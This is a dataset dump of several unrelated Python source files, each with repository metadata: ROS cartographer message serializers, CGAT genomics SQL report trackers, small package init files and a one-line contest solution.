raise genpy.DeserializationError(e) #most likely buffer underfill
def serialize_numpy(self, buff, numpy):
"""
serialize message with numpy array types into buffer
:param buff: buffer, ``StringIO``
:param numpy: numpy python module
"""
try:
_x = self.options.tracking_frame
length = len(_x)
if python3 or type(_x) == unicode:
_x = _x.encode('utf-8')
length = len(_x)
buff.write(struct.pack('<I%ss'%length, length, _x))
_x = self.options.published_frame
length = len(_x)
if python3 or type(_x) == unicode:
_x = _x.encode('utf-8')
length = len(_x)
buff.write(struct.pack('<I%ss'%length, length, _x))
_x = self.options.odom_frame
length = len(_x)
if python3 or type(_x) == unicode:
_x = _x.encode('utf-8')
length = len(_x)
buff.write(struct.pack('<I%ss'%length, length, _x))
_x = self
buff.write(_get_struct_5B4i5d().pack(_x.options.provide_odom_frame, _x.options.use_odometry, _x.options.use_nav_sat, _x.options.use_landmarks, _x.options.publish_frame_projected_to_2d, _x.options.num_laser_scans, _x.options.num_multi_echo_laser_scans, _x.options.num_subdivisions_per_laser_scan, _x.options.num_point_clouds, _x.options.rangefinder_sampling_ratio, _x.options.odometry_sampling_ratio, _x.options.fixed_frame_pose_sampling_ratio, _x.options.imu_sampling_ratio, _x.options.landmarks_sampling_ratio))
_x = self.options.trajectory_builder_options_proto
length = len(_x)
if python3 or type(_x) == unicode:
_x = _x.encode('utf-8')
length = len(_x)
buff.write(struct.pack('<I%ss'%length, length, _x))
_x = self.topics.laser_scan_topic
length = len(_x)
if python3 or type(_x) == unicode:
_x = _x.encode('utf-8')
length = len(_x)
buff.write(struct.pack('<I%ss'%length, length, _x))
_x = self.topics.multi_echo_laser_scan_topic
length = len(_x)
if python3 or type(_x) == unicode:
_x = _x.encode('utf-8')
length = len(_x)
buff.write(struct.pack('<I%ss'%length, length, _x))
_x = self.topics.point_cloud2_topic
length = len(_x)
if python3 or type(_x) == unicode:
_x = _x.encode('utf-8')
length = len(_x)
buff.write(struct.pack('<I%ss'%length, length, _x))
_x = self.topics.imu_topic
length = len(_x)
if python3 or type(_x) == unicode:
_x = _x.encode('utf-8')
length = len(_x)
buff.write(struct.pack('<I%ss'%length, length, _x))
_x = self.topics.odometry_topic
length = len(_x)
if python3 or type(_x) == unicode:
_x = _x.encode('utf-8')
length = len(_x)
buff.write(struct.pack('<I%ss'%length, length, _x))
_x = self.topics.nav_sat_fix_topic
length = len(_x)
if python3 or type(_x) == unicode:
_x = _x.encode('utf-8')
length = len(_x)
buff.write(struct.pack('<I%ss'%length, length, _x))
_x = self.topics.landmark_topic
length = len(_x)
if python3 or type(_x) == unicode:
_x = _x.encode('utf-8')
length = len(_x)
buff.write(struct.pack('<I%ss'%length, length, _x))
except struct.error as se: self._check_types(struct.error("%s: '%s' when writing '%s'" % (type(se), str(se), str(locals().get('_x', self)))))
except TypeError as te: self._check_types(ValueError("%s: '%s' when writing '%s'" % (type(te), str(te), str(locals().get('_x', self)))))
def deserialize_numpy(self, str, numpy):
"""
unpack serialized message in str into this message instance using numpy for array types
:param str: byte array of serialized message, ``str``
:param numpy: numpy python module
"""
try:
if self.options is None:
self.options = cartographer_ros_msgs.msg.TrajectoryOptions()
if self.topics is None:
self.topics = cartographer_ros_msgs.msg.SensorTopics()
end = 0
start = end
end += 4
(length,) = _struct_I.unpack(str[start:end])
start = end
end += length
if python3:
self.options.tracking_frame = str[start:end].decode('utf-8')
else:
self.options.tracking_frame = str[start:end]
start = end
end += 4
(length,) = _struct_I.unpack(str[start:end])
start = end
end += length
if python3:
self.options.published_frame = str[start:end].decode('utf-8')
else:
self.options.published_frame = str[start:end]
start = end
end += 4
(length,) = _struct_I.unpack(str[start:end])
start = end
end += length
if python3:
self.options.odom_frame = str[start:end].decode('utf-8')
else:
self.options.odom_frame = str[start:end]
_x = self
start = end
end += 61
(_x.options.provide_odom_frame, _x.options.use_odometry, _x.options.use_nav_sat, _x.options.use_landmarks, _x.options.publish_frame_projected_to_2d, _x.options.num_laser_scans, _x.options.num_multi_echo_laser_scans, _x.options.num_subdivisions_per_laser_scan, _x.options.num_point_clouds, _x.options.rangefinder_sampling_ratio, _x.options.odometry_sampling_ratio, _x.options.fixed_frame_pose_sampling_ratio, _x.options.imu_sampling_ratio, _x.options.landmarks_sampling_ratio,) = _get_struct_5B4i5d().unpack(str[start:end])
self.options.provide_odom_frame = bool(self.options.provide_odom_frame)
self.options.use_odometry = bool(self.options.use_odometry)
self.options.use_nav_sat = bool(self.options.use_nav_sat)
self.options.use_landmarks = bool(self.options.use_landmarks)
self.options.publish_frame_projected_to_2d = bool(self.options.publish_frame_projected_to_2d)
start = end
end += 4
(length,) = _struct_I.unpack(str[start:end])
start = end
end += length
if python3:
self.options.trajectory_builder_options_proto = str[start:end].decode('utf-8')
else:
self.options.trajectory_builder_options_proto = str[start:end]
start = end
end += 4
(length,) = _struct_I.unpack(str[start:end])
start = end
end += length
if python3:
self.topics.laser_scan_topic = str[start:end].decode('utf-8')
else:
self.topics.laser_scan_topic = str[start:end]
start = end
end += 4
(length,) = _struct_I.unpack(str[start:end])
start = end
end += length
if python3:
self.topics.multi_echo_laser_scan_topic = str[start:end].decode('utf-8')
else:
self.topics.multi_echo_laser_scan_topic = str[start:end]
start = end
end += 4
(length,) = _struct_I.unpack(str[start:end])
start = end
end += length
if python3:
self.topics.point_cloud2_topic = str[start:end].decode('utf-8')
else:
self.topics.point_cloud2_topic = str[start:end]
start = end
end += 4
(length,) = _struct_I.unpack(str[start:end])
start = end
end += length
if python3:
self.topics.imu_topic = str[start:end].decode('utf-8')
else:
self.topics.imu_topic = str[start:end]
start = end
end += 4
(length,) = _struct_I.unpack(str[start:end])
start = end
end += length
if python3:
self.topics.odometry_topic = str[start:end].decode('utf-8')
else:
self.topics.odometry_topic = str[start:end]
start = end
end += 4
(length,) = _struct_I.unpack(str[start:end])
start = end
end += length
if python3:
self.topics.nav_sat_fix_topic = str[start:end].decode('utf-8')
else:
self.topics.nav_sat_fix_topic = str[start:end]
start = end
end += 4
(length,) = _struct_I.unpack(str[start:end])
start = end
end += length
if python3:
self.topics.landmark_topic = str[start:end].decode('utf-8')
else:
self.topics.landmark_topic = str[start:end]
return self
except struct.error as e:
raise genpy.DeserializationError(e) #most likely buffer underfill
_struct_I = genpy.struct_I
def _get_struct_I():
global _struct_I
return _struct_I
_struct_5B4i5d = None
def _get_struct_5B4i5d():
global _struct_5B4i5d
if _struct_5B4i5d is None:
_struct_5B4i5d = struct.Struct("<5B4i5d")
return _struct_5B4i5d
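# Illustrative check (not part of the generated module): the "<5B4i5d" struct
# format used above corresponds to the fixed-width block of TrajectoryOptions
# fields, i.e. 5 one-byte bool flags, 4 int32 counters and 5 float64 sampling
# ratios, which is why deserialize advances the cursor by 61 bytes (5*1 + 4*4 + 5*8).
import struct
assert struct.calcsize("<5B4i5d") == 61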
# This Python file uses the following encoding: utf-8
"""autogenerated by genpy from cartographer_ros_msgs/StartTrajectoryResponse.msg. Do not edit."""
import sys
python3 = True if sys.hexversion > 0x03000000 else False
import genpy
import struct
import cartographer_ros_msgs.msg
class StartTrajectoryResponse(genpy.Message):
_md5sum = "a14602d76d9b734b374a25be319cdbe9"
_type = "cartographer_ros_msgs/StartTrajectoryResponse"
_has_header = False #flag to mark the presence of a Header object
_full_text = """cartographer_ros_msgs/StatusResponse status
int32 trajectory_id
================================================================================
MSG: cartographer_ros_msgs/StatusResponse
# Copyright 2018 The Cartographer Authors
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
# A common message type to indicate the outcome of a service call.
uint8 code
string message
"""
__slots__ = ['status','trajectory_id']
_slot_types = ['cartographer_ros_msgs/StatusResponse','int32']
def __init__(self, *args, **kwds):
"""
Constructor. Any message fields that are implicitly/explicitly
set to None will be assigned a default value. The recommended
use is keyword arguments as this is more robust to future message
changes. You cannot mix in-order arguments and keyword arguments.
The available fields are:
status,trajectory_id
:param args: complete set of field values, in .msg order
:param kwds: use keyword arguments corresponding to message field names
to set specific fields.
"""
if args or kwds:
super(StartTrajectoryResponse, self).__init__(*args, **kwds)
#message fields cannot be None, assign default values for those that are
if self.status is None:
self.status = cartographer_ros_msgs.msg.StatusResponse()
if self.trajectory_id is None:
self.trajectory_id = 0
else:
self.status = cartographer_ros_msgs.msg.StatusResponse()
self.trajectory_id = 0
def _get_types(self):
"""
internal API method
"""
return self._slot_types
def serialize(self, buff):
"""
serialize message into buffer
:param buff: buffer, ``StringIO``
"""
try:
buff.write(_get_struct_B().pack(self.status.code))
_x = self.status.message
length = len(_x)
if python3 or type(_x) == unicode:
_x = _x.encode('utf-8')
length = len(_x)
buff.write(struct.pack('<I%ss'%length, length, _x))
buff.write(_get_struct_i().pack(self.trajectory_id))
except struct.error as se: self._check_types(struct.error("%s: '%s' when writing '%s'" % (type(se), str(se), str(locals().get('_x', self)))))
except TypeError as te: self._check_types(ValueError("%s: '%s' when writing '%s'" % (type(te), str(te), str(locals().get('_x', self)))))
def deserialize(self, str):
"""
unpack serialized message in str into this message instance
:param str: byte array of serialized message, ``str``
"""
try:
if self.status is None:
self.status = cartographer_ros_msgs.msg.StatusResponse()
end = 0
start = end
end += 1
(self.status.code,) = _get_struct_B().unpack(str[start:end])
start = end
end += 4
(length,) = _struct_I.unpack(str[start:end])
start = end
end += length
if python3:
self.status.message = str[start:end].decode('utf-8')
else:
self.status.message = str[start:end]
start = end
end += 4
(self.trajectory_id,) = _get_struct_i().unpack(str[start:end])
return self
except struct.error as e:
raise genpy.DeserializationError(e) #most likely buffer underfill
def serialize_numpy(self, buff, numpy):
"""
serialize message with numpy array types into buffer
:param buff: buffer, ``StringIO``
:param numpy: numpy python module
"""
try:
buff.write(_get_struct_B().pack(self.status.code))
_x = self.status.message
length = len(_x)
if python3 or type(_x) == unicode:
_x = _x.encode('utf-8')
length = len(_x)
buff.write(struct.pack('<I%ss'%length, length, _x))
buff.write(_get_struct_i().pack(self.trajectory_id))
except struct.error as se: self._check_types(struct.error("%s: '%s' when writing '%s'" % (type(se), str(se), str(locals().get('_x', self)))))
except TypeError as te: self._check_types(ValueError("%s: '%s' when writing '%s'" % (type(te), str(te), str(locals().get('_x', self)))))
def deserialize_numpy(self, str, numpy):
"""
unpack serialized message in str into this message instance using numpy for array types
:param str: byte array of serialized message, ``str``
:param numpy: numpy python module
"""
try:
if self.status is None:
self.status = cartographer_ros_msgs.msg.StatusResponse()
end = 0
start = end
end += 1
(self.status.code,) = _get_struct_B().unpack(str[start:end])
start = end
end += 4
(length,) = _struct_I.unpack(str[start:end])
start = end
end += length
if python3:
self.status.message = str[start:end].decode('utf-8')
else:
self.status.message = str[start:end]
start = end
end += 4
(self.trajectory_id,) = _get_struct_i().unpack(str[start:end])
return self
except struct.error as e:
raise genpy.DeserializationError(e) #most likely buffer underfill
_struct_I = genpy.struct_I
def _get_struct_I():
global _struct_I
return _struct_I
_struct_i = None
def _get_struct_i():
global _struct_i
if _struct_i is None:
_struct_i = struct.Struct("<i")
return _struct_i
_struct_B = None
def _get_struct_B():
global _struct_B
if _struct_B is None:
_struct_B = struct.Struct("<B")
return _struct_B
class StartTrajectory(object):
_type = 'cartographer_ros_msgs/StartTrajectory'
_md5sum = 'bed83613a1da70f1e83eafd765dad59d'
_request_class = StartTrajectoryRequest
_response_class = StartTrajectoryResponse
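# A minimal round-trip sketch (illustrative, not part of the generated module;
# the field values are made up): serialize a StartTrajectoryResponse into a
# buffer and read it back with deserialize.
from io import BytesIO
_example_response = StartTrajectoryResponse()
_example_response.status.code = 0
_example_response.status.message = 'Success.'
_example_response.trajectory_id = 3
_example_buffer = BytesIO()
_example_response.serialize(_example_buffer)
_example_restored = StartTrajectoryResponse().deserialize(_example_buffer.getvalue())
assert _example_restored.trajectory_id == 3
assert _example_restored.status.message == 'Success.'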
| avg_line_length: 37.035862 | max_line_length: 528 | alphanum_fraction: 0.658821 | qsc_* quality signals: … |
| hexsha: 22366428693ae275acb01db69ab820da721b2896 | size: 360 | ext: py | lang: Python |
| max_stars_repo_path: adversarial_env/configuration.py | max_stars_repo_name: TorchPAIRED/TorchPAIRED | max_stars_repo_head_hexsha: 0b9b9ef13f9029d23682ed4752ea775230b49eb6 | max_stars_repo_licenses: ["MIT"] | max_stars_count: null | stars_events: null .. null |
| max_issues_repo_path: adversarial_env/configuration.py | max_issues_repo_name: TorchPAIRED/TorchPAIRED | max_issues_repo_head_hexsha: 0b9b9ef13f9029d23682ed4752ea775230b49eb6 | max_issues_repo_licenses: ["MIT"] | max_issues_count: null | issues_events: null .. null |
| max_forks_repo_path: adversarial_env/configuration.py | max_forks_repo_name: TorchPAIRED/TorchPAIRED | max_forks_repo_head_hexsha: 0b9b9ef13f9029d23682ed4752ea775230b49eb6 | max_forks_repo_licenses: ["MIT"] | max_forks_count: null | forks_events: null .. null |
class EnvConfiguration:
def __init__(self, encoding, agent_pos, agent_dir, goal_pos, carrying):
self.encoding, self.agent_pos, self.agent_dir, self.goal_pos, self.carrying = encoding, agent_pos, agent_dir, goal_pos, carrying
def get_configuration(self):
return self.encoding, self.agent_pos, self.agent_dir, self.goal_pos, self.carrying
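# Brief usage sketch (the positions and direction below are made-up values):
# EnvConfiguration is a plain container, and get_configuration() hands back
# the same five fields it was constructed with.
example_config = EnvConfiguration(encoding=None, agent_pos=(1, 2), agent_dir=3,
                                  goal_pos=(5, 5), carrying=None)
assert example_config.get_configuration() == (None, (1, 2), 3, (5, 5), None)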
| avg_line_length: 72 | max_line_length: 136 | alphanum_fraction: 0.761111 | qsc_* quality signals: … |
| hexsha: 223efc84a0bc36ff2dc6d3d1c2c0a7d89c8a7da2 | size: 96 | ext: py | lang: Python |
| max_stars_repo_path: yeast/core/media/sd/__init__.py | max_stars_repo_name: irahorecka/sga-fba | max_stars_repo_head_hexsha: fc7e923da8e79555780359f018c85b5e5339d8d0 | max_stars_repo_licenses: ["MIT"] | max_stars_count: null | stars_events: null .. null |
| max_issues_repo_path: yeast/core/media/sd/__init__.py | max_issues_repo_name: irahorecka/sga-fba | max_issues_repo_head_hexsha: fc7e923da8e79555780359f018c85b5e5339d8d0 | max_issues_repo_licenses: ["MIT"] | max_issues_count: null | issues_events: null .. null |
| max_forks_repo_path: yeast/core/media/sd/__init__.py | max_forks_repo_name: irahorecka/sga-fba | max_forks_repo_head_hexsha: fc7e923da8e79555780359f018c85b5e5339d8d0 | max_forks_repo_licenses: ["MIT"] | max_forks_count: null | forks_events: null .. null |
from yeast.core.media.sd.base import sd
from yeast.core.media.sd.sdszappanos import sdszappanos
| avg_line_length: 32 | max_line_length: 55 | alphanum_fraction: 0.833333 | qsc_* quality signals: … |
| hexsha: 97d4e4a86daba51fb3e5c6b79b4b3ab6c7f537a8 | size: 11,125 | ext: py | lang: Python |
| max_stars_repo_path: CGATPipelines/pipeline_docs/pipeline_proj007/trackers/macs_replicated_interval_associations.py | max_stars_repo_name: cdrakesmith/CGATPipelines | max_stars_repo_head_hexsha: 3c94ae4f9d87d51108255dc405c4b95af7c8b694 | max_stars_repo_licenses: ["MIT"] | max_stars_count: 49 | stars_events: 2015-04-13T16:49:25.000Z .. 2022-03-29T10:29:14.000Z |
| max_issues_repo_path: CGATPipelines/pipeline_docs/pipeline_proj007/trackers/macs_replicated_interval_associations.py | max_issues_repo_name: cdrakesmith/CGATPipelines | max_issues_repo_head_hexsha: 3c94ae4f9d87d51108255dc405c4b95af7c8b694 | max_issues_repo_licenses: ["MIT"] | max_issues_count: 252 | issues_events: 2015-04-08T13:23:34.000Z .. 2019-03-18T21:51:29.000Z |
| max_forks_repo_path: CGATPipelines/pipeline_docs/pipeline_proj007/trackers/macs_replicated_interval_associations.py | max_forks_repo_name: cdrakesmith/CGATPipelines | max_forks_repo_head_hexsha: 3c94ae4f9d87d51108255dc405c4b95af7c8b694 | max_forks_repo_licenses: ["MIT"] | max_forks_count: 22 | forks_events: 2015-05-21T00:37:52.000Z .. 2019-09-25T05:04:27.000Z |
from cpgReport import *
from CGATReport.Tracker import *
from CGATReport.odict import OrderedDict as odict
from macs_annotations import *
##########################################################################
class replicatedAssociationsHierarchy(cpgTracker):
""" """
pattern = "(.*)_replicated_intervals$"
def __call__(self, track, slice=None):
ANNOTATIONS_NAME = P['annotations_name']
statement = """SELECT count(distinct interval_id) as NMIs, feature_class
FROM (
SELECT interval_id,
CASE WHEN coding_tss > 0 THEN 'Protein-coding gene TSS'
WHEN lincrna_tss > 0 THEN 'lncRNA gene TSS'
WHEN short_rna_tss > 0 THEN 'short RNA TSS'
WHEN pseudogene_tss > 0 THEN 'Pseudogene TSS'
WHEN processed_transcript_tss > 0 THEN 'Processed transcript TSS'
WHEN enhancer >0 THEN 'Enhancer (H3K4Me1)'
WHEN rnaseq >0 THEN 'Novel RNAseq transcript TSS'
ELSE 'Intergenic'
END AS feature_class FROM (
SELECT i.interval_id, a.coding_tss, b.lincrna_tss, c.short_rna_tss, d.pseudogene_tss, e.processed_transcript_tss, f.enhancer, g.rnaseq FROM %(track)s_replicated_intervals i
left join
(SELECT distinct gene_id, 1 as coding_tss
FROM %(track)s_replicated_%(ANNOTATIONS_NAME)s_overlap
where (genes_nover>0 OR downstream_flank_nover>0 OR upstream_flank_nover>0) ) a
on a.gene_id=i.interval_id
left join
(SELECT distinct gene_id, 1 as lincrna_tss
FROM %(track)s_replicated_lncrna_tss_distance
where closest_dist < 1000) b
on i.interval_id=b.gene_id
left join
(SELECT distinct n.gene_id as gene_id, 1 as short_rna_tss
FROM %(track)s_replicated_%(ANNOTATIONS_NAME)s_noncoding_tss_distance n,
annotations.transcript_info t, %(track)s_replicated_%(ANNOTATIONS_NAME)s_interval_noncoding_mapping m
where n.gene_id=m.interval_id
AND m.gene_id=t.gene_id
AND t.gene_biotype IN ("miRNA","snRNA","snoRNA","rRNA")
AND n.closest_dist < 1000) c
on i.interval_id=c.gene_id
left join
(SELECT distinct n.gene_id as gene_id, 1 as pseudogene_tss
FROM %(track)s_replicated_%(ANNOTATIONS_NAME)s_noncoding_tss_distance n,
annotations.transcript_info t, %(track)s_replicated_%(ANNOTATIONS_NAME)s_interval_noncoding_mapping m
where n.gene_id=m.interval_id
AND m.gene_id=t.gene_id
AND t.gene_biotype="pseudogene"
AND n.closest_dist < 1000) d
on i.interval_id=d.gene_id
left join
(SELECT distinct n.gene_id as gene_id, 1 as processed_transcript_tss
FROM %(track)s_replicated_%(ANNOTATIONS_NAME)s_noncoding_tss_distance n,
annotations.transcript_info t, %(track)s_replicated_%(ANNOTATIONS_NAME)s_interval_noncoding_mapping m
where n.gene_id=m.interval_id
AND m.gene_id=t.gene_id
AND t.gene_biotype="processed_transcript"
AND n.closest_dist < 1000) e
on i.interval_id=e.gene_id
left join
(SELECT distinct interval_id, 1 as enhancer
FROM %(track)s_replicated_h3k4me1_intervals) f
on i.interval_id=f.interval_id
left join
(SELECT distinct gene_id, 1 as rnaseq
FROM %(track)s_replicated_rnaseq_tss_distance
WHERE closest_dist < 1000) g
on i.interval_id=g.gene_id))
group by feature_class
order by feature_class asc;""" % locals()
data = self.getAll(statement)
return data
##########################################################################
class replicatedAssociationsHierarchy3(cpgTracker):
""" """
pattern = "(.*)_replicated_intervals$"
def __call__(self, track, slice=None):
ANNOTATIONS_NAME = P['annotations_name']
statement = """SELECT count(distinct interval_id) as NMIs, feature_class
FROM (
SELECT interval_id,
CASE WHEN coding_tss > 0 THEN 'Protein-coding gene TSS'
WHEN lincrna_tss > 0 THEN 'lncRNA gene TSS'
WHEN short_rna_tss > 0 THEN 'short RNA TSS'
WHEN enhancer >0 THEN 'Enhancer (H3K4Me1)'
WHEN rnaseq >0 THEN 'Novel RNAseq transcript TSS'
ELSE 'Intergenic'
END AS feature_class FROM (
SELECT i.interval_id, a.coding_tss, b.lincrna_tss, c.short_rna_tss, f.enhancer, g.rnaseq FROM %(track)s_replicated_intervals i
left join
(SELECT distinct gene_id, 1 as coding_tss
FROM %(track)s_replicated_%(ANNOTATIONS_NAME)s_overlap
where (genes_nover>0 OR downstream_flank_nover>0 OR upstream_flank_nover>0) ) a
on a.gene_id=i.interval_id
left join
(SELECT distinct gene_id, 1 as lincrna_tss
FROM %(track)s_replicated_lncrna_tss_distance
where closest_dist < 1000) b
on i.interval_id=b.gene_id
left join
(SELECT distinct n.gene_id as gene_id, 1 as short_rna_tss
FROM %(track)s_replicated_%(ANNOTATIONS_NAME)s_noncoding_tss_distance n,
annotations.transcript_info t, %(track)s_replicated_%(ANNOTATIONS_NAME)s_interval_noncoding_mapping m
where n.gene_id=m.interval_id
AND m.gene_id=t.gene_id
AND t.gene_biotype IN ("miRNA","snRNA","snoRNA","rRNA")
AND n.closest_dist < 1000) c
on i.interval_id=c.gene_id
left join
(SELECT distinct interval_id, 1 as enhancer
FROM %(track)s_replicated_h3k4me1_intervals) f
on i.interval_id=f.interval_id
left join
(SELECT distinct gene_id, 1 as rnaseq
FROM %(track)s_replicated_rnaseq_tss_distance
WHERE closest_dist < 1000) g
on i.interval_id=g.gene_id))
group by feature_class
order by feature_class asc;""" % locals()
data = self.getAll(statement)
return data
##########################################################################
class replicatedAssociationsHierarchy2(cpgTracker):
""" """
pattern = "(.*)_replicated_intervals$"
def __call__(self, track, slice=None):
ANNOTATIONS_NAME = P['annotations_name']
statement = """SELECT count(distinct interval_id) as NMIs, feature_class
FROM (
SELECT interval_id,
CASE WHEN coding_tss > 0 THEN 'Protein-coding gene TSS'
WHEN noncoding_tss > 0 THEN 'Non-coding gene TSS'
ELSE 'Intergenic'
END AS feature_class FROM (
SELECT i.interval_id, a.coding_tss, b.noncoding_tss
FROM %(track)s_replicated_intervals i
left join
(SELECT distinct gene_id, 1 as coding_tss
FROM %(track)s_replicated_%(ANNOTATIONS_NAME)s_overlap
where (genes_nover>0 OR downstream_flank_nover>0 OR upstream_flank_nover>0) ) a
on a.gene_id=i.interval_id
left join
(SELECT distinct gene_id, 1 as noncoding_tss
FROM %(track)s_replicated_%(ANNOTATIONS_NAME)s_noncoding_tss_distance
where closest_dist < 1000) b
on i.interval_id=b.gene_id))
group by feature_class
order by feature_class asc;""" % locals()
data = self.getAll(statement)
return data
##########################################################################
class replicatedAssociations(cpgTracker):
""" """
pattern = "(.*)_replicated_intervals$"
def __call__(self, track, slice=None):
ANNOTATIONS_NAME = P['annotations_name']
try:
data1 = self.getValue("""SELECT count(distinct gene_id) as intervals
FROM %(track)s_replicated_%(ANNOTATIONS_NAME)s_overlap
where (genes_nover>0 OR downstream_flank_nover>0 OR upstream_flank_nover>0)""" % locals() )
except:
data1 = "0"
try:
data2 = self.getValue("""SELECT count(distinct gene_id) as intervals
FROM %(track)s_replicated_%(ANNOTATIONS_NAME)s_noncoding_tss_distance
where closest_dist < 1000""" % locals() )
except:
data2 = "0"
try:
data3 = self.getValue("""SELECT distinct count(distinct interval_id) as intervals, "enhancer" as feature_class
FROM %(track)s_replicated_h3k4me1_intervals""" % locals() )
except:
data3 = "0"
try:
data4 = self.getValue("""SELECT count(distinct gene_id) as intervals
FROM %(track)s_replicated_rnaseq_tss_distance
where closest_dist < 1000""" % locals() )
except:
data4 = "0"
try:
data5 = self.getValue("""SELECT count(distinct gene_id) as intervals
FROM %(track)s_replicated_lncrna_tss_distance
where closest_dist < 1000""" % locals() )
except:
data5 = "0"
return odict(list(zip(("Protein-coding TSS", "Non-coding TSS", "H3K4Me1 Enhancer", "RNAseq transcript", "lincRNA TSS"), (data1, data2, data3, data4, data5))))
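# A minimal sketch of the templating used by every tracker above: table names
# are assembled by substituting the track and annotation names into the query
# string with "% locals()". The values "liver" and "ensembl75" are made up for
# illustration only.
example_track = "liver"
example_annotations_name = "ensembl75"
example_statement = """SELECT count(distinct gene_id)
FROM %(example_track)s_replicated_%(example_annotations_name)s_overlap
WHERE genes_nover > 0""" % locals()
assert "liver_replicated_ensembl75_overlap" in example_statement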
| avg_line_length: 51.744186 | max_line_length: 197 | alphanum_fraction: 0.513258 | qsc_* quality signals: … |
| hexsha: 97e873d26fd4e4e1f975c8c00a58feca5964fd2d | size: 84 | ext: py | lang: Python |
| max_stars_repo_path: pyspectools/models/__init__.py | max_stars_repo_name: aowen-uwmad/PySpecTools | max_stars_repo_head_hexsha: 3fd0b68352910df1e653370797a8edd46d92fa1c | max_stars_repo_licenses: ["MIT"] | max_stars_count: 22 | stars_events: 2018-03-14T10:44:17.000Z .. 2022-01-10T15:02:37.000Z |
| max_issues_repo_path: pyspectools/models/__init__.py | max_issues_repo_name: aowen-uwmad/PySpecTools | max_issues_repo_head_hexsha: 3fd0b68352910df1e653370797a8edd46d92fa1c | max_issues_repo_licenses: ["MIT"] | max_issues_count: 21 | issues_events: 2019-07-27T01:43:50.000Z .. 2021-11-15T14:57:15.000Z |
| max_forks_repo_path: pyspectools/models/__init__.py | max_forks_repo_name: aowen-uwmad/PySpecTools | max_forks_repo_head_hexsha: 3fd0b68352910df1e653370797a8edd46d92fa1c | max_forks_repo_licenses: ["MIT"] | max_forks_count: 3 | forks_events: 2020-08-03T16:22:00.000Z .. 2021-11-01T15:31:55.000Z |
from pyspectools.models import classes
from pyspectools.models import torch_models
| avg_line_length: 21 | max_line_length: 43 | alphanum_fraction: 0.869048 | qsc_* quality signals: … |
| hexsha: 3f0a33656987ca637cb8ea3d9ca1d4411c07e876 | size: 86 | ext: py | lang: Python |
| max_stars_repo_path: ACM-Solution/TRGRID.py | max_stars_repo_name: wasi0013/Python-CodeBase | max_stars_repo_head_hexsha: 4a7a36395162f68f84ded9085fa34cc7c9b19233 | max_stars_repo_licenses: ["MIT"] | max_stars_count: 2 | stars_events: 2016-04-26T15:40:40.000Z .. 2018-07-18T10:16:42.000Z |
| max_issues_repo_path: ACM-Solution/TRGRID.py | max_issues_repo_name: wasi0013/Python-CodeBase | max_issues_repo_head_hexsha: 4a7a36395162f68f84ded9085fa34cc7c9b19233 | max_issues_repo_licenses: ["MIT"] | max_issues_count: 1 | issues_events: 2016-04-26T15:44:15.000Z .. 2016-04-29T14:44:40.000Z |
| max_forks_repo_path: ACM-Solution/TRGRID.py | max_forks_repo_name: wasi0013/Python-CodeBase | max_forks_repo_head_hexsha: 4a7a36395162f68f84ded9085fa34cc7c9b19233 | max_forks_repo_licenses: ["MIT"] | max_forks_count: 1 | forks_events: 2018-10-02T16:12:19.000Z .. 2018-10-02T16:12:19.000Z |
exec("n,m=map(int,input().split());print(['LR'[n%2],'UD'[m%2]][n>m]);"*int(input()))
| avg_line_length: 43 | max_line_length: 85 | alphanum_fraction: 0.523256 | qsc_* quality signals: … |
| hexsha: 3f63edc10e21f92e3052123ff38f0b2488e68532 | size: 63 | ext: py | lang: Python |
| max_stars_repo_path: q2_itsxpress/__init__.py | max_stars_repo_name: kweber1/ITSxpress-qiime2 | max_stars_repo_head_hexsha: a2a2e7bc12fecd27319f0ab705a78e54a3a926d3 | max_stars_repo_licenses: ["CC0-1.0"] | max_stars_count: 8 | stars_events: 2018-07-12T21:40:50.000Z .. 2021-12-06T01:52:14.000Z |
| max_issues_repo_path: q2_itsxpress/__init__.py | max_issues_repo_name: kweber1/ITSxpress-qiime2 | max_issues_repo_head_hexsha: a2a2e7bc12fecd27319f0ab705a78e54a3a926d3 | max_issues_repo_licenses: ["CC0-1.0"] | max_issues_count: 8 | issues_events: 2018-07-26T14:45:23.000Z .. 2022-01-24T15:23:41.000Z |
| max_forks_repo_path: q2_itsxpress/__init__.py | max_forks_repo_name: kweber1/q2_itsxpress | max_forks_repo_head_hexsha: a2a2e7bc12fecd27319f0ab705a78e54a3a926d3 | max_forks_repo_licenses: ["CC0-1.0"] | max_forks_count: 3 | forks_events: 2019-02-25T19:52:14.000Z .. 2022-03-29T14:14:09.000Z |
import q2_itsxpress._itsxpress
import q2_itsxpress.plugin_setup
| avg_line_length: 31.5 | max_line_length: 32 | alphanum_fraction: 0.920635 | qsc_* quality signals: … |
| hexsha: 3f6bf45199adf5640ba7629b31d68fd52f19bff1 | size: 196 | ext: py | lang: Python |
| max_stars_repo_path: tests/func/multipoint/__init__.py | max_stars_repo_name: phuntimes/mongoshapes | max_stars_repo_head_hexsha: f461c67343c32c6b97af8d67a269b4de492d1d71 | max_stars_repo_licenses: ["MIT"] | max_stars_count: 1 | stars_events: 2020-11-26T05:58:23.000Z .. 2020-11-26T05:58:23.000Z |
| max_issues_repo_path: tests/func/multipoint/__init__.py | max_issues_repo_name: Sean-McVeigh/mongoshapes | max_issues_repo_head_hexsha: f461c67343c32c6b97af8d67a269b4de492d1d71 | max_issues_repo_licenses: ["MIT"] | max_issues_count: null | issues_events: null .. null |
| max_forks_repo_path: tests/func/multipoint/__init__.py | max_forks_repo_name: Sean-McVeigh/mongoshapes | max_forks_repo_head_hexsha: f461c67343c32c6b97af8d67a269b4de492d1d71 | max_forks_repo_licenses: ["MIT"] | max_forks_count: null | forks_events: null .. null |
#!/usr/bin/env python
# -*- coding: utf-8 -*-
from mongoshapes import MultiPoint as GeoShape
from mongoshapes import MultiPointDict as GeoDict
from mongoshapes import MultiPointField as GeoField
| avg_line_length: 28 | max_line_length: 51 | alphanum_fraction: 0.795918 | qsc_* quality signals: … |
| hexsha: 3f71ad804cc87bc731c3ba147654ada08e6d1b27 | size: 25,531 | ext: py | lang: Python |
